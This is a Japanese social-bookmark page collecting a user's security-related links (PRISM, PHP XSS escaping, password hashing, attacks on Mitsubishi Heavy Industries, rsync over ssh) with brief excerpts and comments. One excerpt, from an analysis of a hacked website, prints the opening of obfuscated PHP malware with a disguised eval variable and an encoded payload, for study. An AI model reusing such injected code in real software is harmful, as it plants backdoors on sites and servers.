タグ

securityに関するwindscapeのブックマーク (108)

  • チャットもメールも通話も国に監視されてましたーPRISMとイランのISPの昔話

    ただ今アメリカを揺るがす最大の話題はWWDC・・・じゃなくてPRISM。国がこっそり国民の通信データを監視してたことが明るみに出た。収集されていたデータはAT&TとVerizonの通信データに加え、GoogleApple、Facebook、Yahooなど9社のもの。収集情報は、メール、チャット、ビデオ、写真、格納データ、VoIP通話、ファイル転送、ビデオコンファレンス、容疑者のアクティビティ(ログイン等)、ソーシャルネットワーク活動の詳細、その他特別に要請した内容、となっている。年間運用費用2千万ドル。こんな超巨大データセンターまで建設してデータ解析にいそしんでいるらしい。そのプログラムの名前がPRISM。やばいよねぇ、これ。 国家機関NSAのコントラクタとして働いていたSnowdenという29才がマスコミにリークしたことで明るみに出た。 ちなみに、NSAはNational Securi

    windscape
    windscape 2013/06/13
    全部しれっと盗聴するアメリカが中国の怪しい通信機械にイチャモンつけるみたいなSFより現実が奇なりみたいな世界になってきたんだなー
  • 子供を取り巻くインターネットとその問題点

    兵庫県の小学校で2013/02/20発表するための資料。 話す際のノートを含め公開しているので、再利用される場合は参考にどうぞ。 セッションを受けた人の感想とか↓に書いてます http://d.hatena.ne.jp/hanazukin/20130312/1363069453

    子供を取り巻くインターネットとその問題点
  • 【LINE】既読にしないで相手に知らせずLINEの未読メッセージを読む方法 - ぼくはまちちゃん!

    こんにちはこんにちは!! LINE使ってますか! スマホのメッセンジャーアプリ! すっごい流行ってますよね! なんでも世界でユーザーが4000万人を越えたとか…! そんなこんなで、先日ちょっとしたイベントで偶然、Barimiちゃんに会った時にも、LINEのお話がでました。 はまち:「あ、ばりみちゃんもLINE使ってるんですね」 ばりみ:「めっちゃ使ってるよ〜、でもこれ [既読]っていうのが相手に伝わるのがたまにやだな〜」 はまち:「あ〜、読んだことが相手に伝わるんですよね」 ※既読の例 たしかに、読んだことが相手に伝わってしまうと、 相手に「なんで読んだのに返事くれないのかなぁ」とか思われたりで、ちょっと面倒なんですよね。 同じような不便を感じてる人、他にも多いかもしれない。 そんなわけで暇にまかせてこんなツールを作ってみました。 Stealth LINE - 既読にしないで相手に知らせず

    windscape
    windscape 2012/06/07
    はまちおにいちゃんかっこいい
  • はてなブックマーク開発ブログ

    はてなブックマークのブックマーク数が多い順に記事を紹介する「はてなブックマーク数ランキング」。9月4日(月)〜9月10日(日)〔2023年9月第2週〕のトップ30です*1。 順位 タイトル 1位 OpenInterpreter / ついにAIがガチのアシスタントに!これは凄い、というか凄すぎる|shi3z 2位 元給営業マンが「ホーユー」の学校・警察での給提供停止騒動の原因をざっくり解説してみた。 - Everything you've ever Dreamed 3位 横向きA4サイズの現代アート。霞が関の「ポンチ絵」はどうして生まれたか? その知られざる使命とは|narumi 4位 ダイヤモンドにかかった魔法が解ける日。天然ダイヤの終焉?|nayadia 5位 小児性愛者だけど生きるのが辛い 6位 ジャニーズ事務所、ブランド名を温存について(9/8追記) - はてブの出来事 7位 (

    はてなブックマーク開発ブログ
    windscape
    windscape 2012/03/13
    これをマズイと誰も気づけなかったのか!っていう話題になってるけど、モヒカンっぽい人が騒がないと誰も相手にしてくれないっていうはてな村の問題もある気がするんだ
  • 5分でできるPHPセキュリティ対策 - ぼくはまちちゃん!

    こんにちはこんにちは!! Webプログラミングしてますか! よく「PHPセキュリティがダメ」とか言われてるよね。 でもそれって、べつにPHPが悪いんじゃなくて、 たぶん、セキュリティとかが、まだよくわからない人が多いだけなんじゃないかな。 がんばって勉強しようと思っても、なんだか難しい理屈が並んでいたりするしね…。 なので今日は、セキュリティ対策について、 「これだけやっとけば、わりと安全になるよ」ってことを、初心者むけに、大雑把に書いてみます! 理屈がわからなくても、最初はコピペでも、 なにもやらないより、やったほうがきっとマシになる! 1. XSS対策 動的なものを表示するとき、全部エスケープすればokです! (NG) あなたの名前は <?= $name ?> ですね! ↓ (OK) あなたの名前は <?= htmlspecialchars($name, ENT_QUOTES) ?>

    5分でできるPHPセキュリティ対策 - ぼくはまちちゃん!
  • Apache(Linux)に、Windowsドメイン認証を利用して、シングルサインオンを実現する詳細手順 - 元RX-7乗りの適当な日々

    Linuxで稼動させているApacheにて認証が必要なWebサービスに、Windowsドメイン(Active Directory)の認証情報を使って、シングルサインオンを実現させるまでの手順を備忘録として残しておきます。 今回、ブラウザは、IEとFirefoxにて動作確認を行いました。 Windowsドメインログオンをしているクライアントから、上記2種類のブラウザを使うと、NTLM認証※を利用しているWebサービスには、認証済みのドメインログオンの情報を利用することができ、ユーザ名やパスワードを入力する必要の無いシングルサインオン環境が実現できます。 ※NTLM認証(NT LAN Manager authentication)とは - IT用語辞典 e-Words 前提 今回利用した構成は以下のような感じ。 Webサーバ CentOS 5 Apache 2.2 + mod_auth_ntl

    Apache(Linux)に、Windowsドメイン認証を利用して、シングルサインオンを実現する詳細手順 - 元RX-7乗りの適当な日々
  • 「管理者パスワードは何日ごとに変更すればよいか」に関する質疑応答 - ockeghem's blog

    昨日Webサイトを守るためのセキュリティ講習会の講師を担当しました。講習会の終了後、受講生から「管理者パスワードの定期的変更」に関する質問がありました。備忘の為、質疑内容を以下に記録します。 Q1:上位ポリシーにて、管理者パスワードは定期的に変更するように義務づけられているが、何日毎に変更するのが正しいのか。最近の専門家の見解をお伺いしたい A1:専門家の見解は分かれているとお答えしました 現在の主流はパスワードを定期的に変更するべしという考え方ですが、それに異論を持つ人もいて、私もその一人です。 一般ユーザのパスワードとは異なり、管理者パスワードは、業務の必要上複数の人が知っている状況があります。その状況では、「定期的に変更」するのではなく、管理者パスワードを知っている人が、他業務に異動、あるいは退職するタイミングで遅滞なく変更するべきです。そうしないと、「管理者でなくなった人が管理者パ

    「管理者パスワードは何日ごとに変更すればよいか」に関する質疑応答 - ockeghem's blog
  • そらいさんのサイトが改竄されたそうなので解析してみた

    そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。 ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww 問題のコード問題のコードはこれです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiL

  • http://e0166nt.com/blog-entry-975.html

    http://e0166nt.com/blog-entry-975.html
  • 標的型攻撃を防ぐには最新のパッチが有効、ゼロデイ攻撃は多くない

    今年は、三菱重工業や官公庁、国会議員を狙ったサイバー攻撃が大きな話題となった。こうした攻撃の実態はどのようなもので、被害を防ぐにはどのような手立てがあるのか。F-Secureのセキュリティ研究所で主席研究員を務めるミッコ・ヒッポネン氏に話を聞いた。 我々はこの種の標的型攻撃を調査してきたが、その結果として、実は2005年より前から標的型攻撃はあったということが分かった。それがいわゆるグローバルな問題となってきたということだろう。いま起こっているのは、オンラインでのスパイ活動だ。つまり国と国との間のスパイ活動がオンラインで行われている。 ターゲットとなっているのは、政府機関、国防関係の契約を請け負ってる企業、それから言論の自由を主張するような団体といったところだ。 スパイとは何かと言えば、情報を集めることだ。昔は情報は主に紙に書いてあり、オフィスなどに置いてある物理的なモノの中に情報があった

    標的型攻撃を防ぐには最新のパッチが有効、ゼロデイ攻撃は多くない
  • 日本へのサイバー攻撃の発信源が明らかに 攻撃対象の国別に編成されていた諜報機関 | JBpress (ジェイビープレス)

    米国でも日でも、サイバー攻撃が波紋を広げ始めた。サイバー攻撃とは、コンピューターのネットワークへの攻撃である。日では衆議院や参議院の各議員の事務所や三菱重工業のような防衛産業の中枢にサイバー攻撃がかけられた。 その発信源はほとんどが中国だという証拠が指摘されている。もし中国だとすれば、中国のどのような組織が米国や日のコンピューターネットワークに攻撃を発してくるのか。 その発信源がワシントンで明らかにされた。結論を先に言えば、日米両国にサイバー攻撃をかけてくる最大の仕掛け人は中国人民解放軍の「総参謀部 第3部」という組織だというのだ。 米国の首都ワシントンでも2010年から2011年にかけて、サイバー攻撃の被害が頻繁に伝えられるようになった。 サイバー攻撃には大別して2種類がある。第1はコンピューターネットワークへの侵入である。情報を盗むことが主目的となる。第2はコンピューターネットワ

    日本へのサイバー攻撃の発信源が明らかに 攻撃対象の国別に編成されていた諜報機関 | JBpress (ジェイビープレス)
  • サードパーティCookieの歴史と現状 Part1 前提知識の共有 - 最速転職研究会

    Web開発者のためのサードパーティCookieやらトラッキングやらの問題点について三回ぐらいに分けて書きます。 この文章は個人的に書いていますので、おい、お前のところのサービスがサードパーティCookieに依存してるじゃねーかというツッコミがあるかもしれないが、そういうことを気にしているといつまで経っても公開できないという問題が出てしまうので、そんなことはお構いなしに書く。ちなみに例外なく自社サービスに対してもサードパーティCookieに依存するな死ねと言っている。これはWebプログラマー観点で、自分がサービス開発に関わる上で知っておかねばならないだろう知識として十数年間だらだらとWebを見ていて自然に知っていたものと、あるいは興味を持って率先して調べたものが含まれている。ググッて直ぐに分かる程度の用語の定義的なことは書かない。あくまでWebサイト制作者側からの観点なので、ブラウザ開発関係

    サードパーティCookieの歴史と現状 Part1 前提知識の共有 - 最速転職研究会
  • セキュリティーと危機管理に欠陥…三菱重報告書 : 社会 : YOMIURI ONLINE(読売新聞)

    三菱重工業へのサイバー攻撃事件で、同社が内部のセキュリティーシステムと社内の危機管理態勢の双方に問題があったとする報告書をまとめていたことがわかった。 感染拡大を防げなかった背景として、ネットワークの監視システムの弱さや、社内横断的なリスク管理態勢の欠陥があったと分析。さらに、問題発生時の対応手順が不明確だったことが国への報告遅れを招いたとも指摘した。同社は今後、情報セキュリティーの基方針を改定するとともに、来年4月をめどに組織改編に取り組む。 報告書や関係者の証言によると、同社では事件が発覚するまで、外部との通信をリアルタイムで監視していないなど、「国防の中核を担う企業として不十分と言わざるを得ない態勢」(防衛省幹部)だった。また、年に1回、社員に対し情報セキュリティーの教育を実施していたが、今回被害に遭ったような最新の標的型メール攻撃については扱っていなかったという。海外では既に数年

  • 後付けのセキュリティー対策では防げない:日経ビジネスオンライン

    9月に発覚した三菱重工業へのサイバー攻撃は、機密性の高い防衛産業が狙われたことで内外に衝撃が走ったが、その後、衆参両院や外務省の在外公館、中央省庁が標的型メールを送りつけられるサイバー攻撃に遭っていたことが次々に明らかとなり、官民のセキュリティー関係者にショックを与えている。 10月に発覚した国土地理院へのサイバー攻撃では、測量用サーバーが外部へのサイバー攻撃の踏み台になっていたことが明らかとなり、国内の大学や民間企業への攻撃の中継サーバーとして使用されていた。政府は10月25日、サイバー攻撃に関する情報共有の「サイバー情報共有イニシアチブ(J-CSIP)」を発足させた。これまでにない危機意識の表れといえる。 日のネットワークセキュリティーはなぜ頻繁に破られるのか、サイバー攻撃への対策に欠陥はないのか。そうした点について、セキュリティー専門家のウィリアム齋藤氏に聞いた。齋藤氏はカリフォル

    後付けのセキュリティー対策では防げない:日経ビジネスオンライン
  • rsync + cron + ssh (rsyncd を立てない編)

    目的と環境条件 このテキストでは、 rsync を使ったリモートバックアップ(遠隔バックアッ プ)の方法、特に ssh と cron を利用して、暗号化された経路を経由しての バックアップを自動的に行うための手順を示します。 ここで ssh の認証には、パスフレーズを空にし、かつ実行できるコマンドを 限定した ssh 鍵ペアを作成し使用します。これにより、 ssh-agent や eychain を利用する方法、ホストベース認証を利用する方法よりも安全なバッ クアップ体制が整えられる……はずです。 なお、このドキュメントの内容の正確さについては無保証です。なんせ、備忘 録みたいなものですので……。また、このドキュメントに書かれていることを 実行した結果直接的および間接的に発生した損害について、私(佐藤裕介)は 何ら責任を負いかねます。 用語の説明 ローカルホスト、ローカルマシン、ローカル

  • Androidユーザー必見 セキュリティ企業5社に聞くウイルス対策

    スマートフォンのセキュリティ対策の重要性は分かる。でもセキュリティ対策ソフトはインストールしない。そんなユーザーに対する回答として、エフセキュア、カスペルスキー、シマンテック、トレンドマイクロ、マカフィーに聞いたコメントをまとめた。 近年、米国を中心に個人の私物端末を業務でも利用可能とするBYOD(Bring Your Own Device)の動きが加速している。ここでいう端末とは、PCや携帯電話はもちろんのこと、国内でもユーザー数が急増しているスマートフォンやタブレットが含まれる。特に最近ではスマートフォンの企業導入が進んでおり、そうした際に検討事項に挙がるのが「プライベートで使用している端末をそのまま業務用に使わせてしまおう」という考えではないだろうか。 法人導入が当たり前の業務PCとは異なり、ユーザー主導で導入が進んだスマートフォンは「既に持っている」人が大半で、企業が一斉配布するよ

    Androidユーザー必見 セキュリティ企業5社に聞くウイルス対策
  • 三菱重工ハッキングでも使われた「自動実行」の仕組みとは?

    2011年9月19日、多くの新聞およびテレビやインターネットメディアで衝撃的なニュースが報道されました。日の国防や発電などの基盤産業を支える重要企業の1つである三菱重工業で、国内11拠点でサーバーやPCがマルウェアに感染し、情報が抜き出された可能性があるというのです。 同日発表された三菱重工業の公式見解によると、マルウェア感染の事実は確認され、そのマルウェアの特性から情報漏えいの危険性があることが判明したものの、製品や技術に関する情報の社外へのデータ流出は確認されていないとのことです。ですが、一部のユーザのパスワード情報が流出した可能性なども報道されています。国の防衛上の機密に係るため情報が限定的ではありますが、マルウェアの感染による情報流出および対処の難しさと再認識させられます。 事件に関する一部報道では、感染したマルウェアは8種類あり、その中にはスパイウェアに分類される「TSPY_

    三菱重工ハッキングでも使われた「自動実行」の仕組みとは?
  • ソニーがPSNアカウントなどへの不正アクセス発表、原因は第三者のなりすまし

    4月に行われた外部からの不正侵入によって「PlayStation Network(PSN)」などのサービスが長期にわたって停止したことは記憶に新しいですが、ソニーがPSNアカウントなどに対して不正アクセスが行われたことを発表しました。 Sony Japan | PlayStationRNetwork、“Sony Entertainment Network”、Sony Online Entertainmentのユーザーアカウントへの第三者の“なりすまし”による不正なサインインの試行について ソニーおよびソニー・コンピュータエンタテインメントのプレスリリースによると、アメリカの太平洋夏時間10月7日から10日にかけて、「PlayStation Network(PSN)」「Sony Entertainment Network(SEN)」および「Sony Online Entertainment

    ソニーがPSNアカウントなどへの不正アクセス発表、原因は第三者のなりすまし
    windscape
    windscape 2011/10/12
    辛いなぁ
  • 社内のシステム監視やってるけど質問ある? : はれぞう

  • 本当は怖いパスワードの話 ハッシュとソルト、ストレッチングを正しく理解する - @IT

    PSN侵入の件から始めよう 今年のセキュリティの話題の中でも特に注目されたものとして、4月20日に起こったPSN侵入事件があります。5月1日にソニーが記者会見をネット中継したことから、ゴールデンウィーク中にもかかわらず多くの方がネット中継を視聴し、感想をTwitterに流しました。もちろん、筆者もその1人です。 このときの様子は、「セキュリティクラスタまとめのまとめ」を連載している山洋介山さんが、Togetterでまとめています。 Togetterのまとめを読むと、漏えいしたパスワードがどのように保護されていたかが非常に注目されていることが分かります。Togetterのタイムラインで、14:48ごろにいったん「パスワードは平文保存されていた」と発表されると、「そんな馬鹿な」という、呆れたり、驚いたりのつぶやきが非常に多数流れます。 しかし、15:03ごろに「パスワードは暗号化されてなかっ

    本当は怖いパスワードの話 ハッシュとソルト、ストレッチングを正しく理解する - @IT